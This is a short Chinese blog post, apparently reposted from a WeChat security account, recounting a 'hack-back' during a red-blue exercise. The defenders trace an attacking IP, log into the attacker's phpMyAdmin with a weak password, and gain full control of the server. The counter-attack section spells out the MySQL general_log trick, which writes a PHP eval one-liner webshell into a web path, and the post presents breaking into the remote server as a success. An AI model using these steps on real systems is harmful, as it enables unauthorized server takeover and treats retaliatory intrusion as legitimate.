一次溯源反制全过程

  • A+
所属分类:安全文章

 

 

hw结束有一段时间,总结了一些关于护网期间发生的攻击溯源反制的事件来写写。本文章仅供参考,不针对任何厂商及公司。友好交流开始......

公司在接收某监测设备关于疑似攻击地址通告后,发现有一起历史攻击的攻击源IP属于该通告的IP清单列表。针对该攻击源IP立即组织溯源反制,成功获得攻击方服务器最高操作权限。

一、攻击发现

1.2020年xxx分左右,公司防守队伍根据监测设备的监控日志监测到外网IP 频繁访问技术支持系统,并存在攻击行为。

2.通过威胁情报发现该地址为美国idc服务器

由于hw前期备战阶段特殊性,一些IP可能存在提前踩点行为,公司立即通过防火墙封禁IP,并将该IP加入情报中心进行持续监控关注。

 

二、攻击溯源

通过干净的虚拟机和IP尝试访问各开放服务,其中80端口开放,有探针服务。

 护网 | 一次溯源反制全过程

 

三、攻击反制

1.通过漏洞扫描发现该IP存在phpmyadmin弱口令漏洞且同时开放3389服务

2.使用phpmyadmin后getshell

第一步:set global general_log='on'      # 开启日志

第二步:set global  general_log_file ="探针页面存在物理路径"       # 日志写入的文件

第三步:select "<?php eval($_POST['x'])?>"      # 执行带有一句话的sql语句

 

护网 | 一次溯源反制全过程

护网 | 一次溯源反制全过程

护网 | 一次溯源反制全过程

漏洞攻击过程截图

 

护网 | 一次溯源反制全过程

命令执行成功

综上,该IP确认为恶意攻击源,通过溯源与反制工作获得攻击方服务器操作权限。

PS:如果觉得本篇文章对您有所帮助,欢迎关注!帮忙点个赞,转发一下 分享出去吧!

本文始发于微信公众号(LSCteam):护网 | 一次溯源反制全过程

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: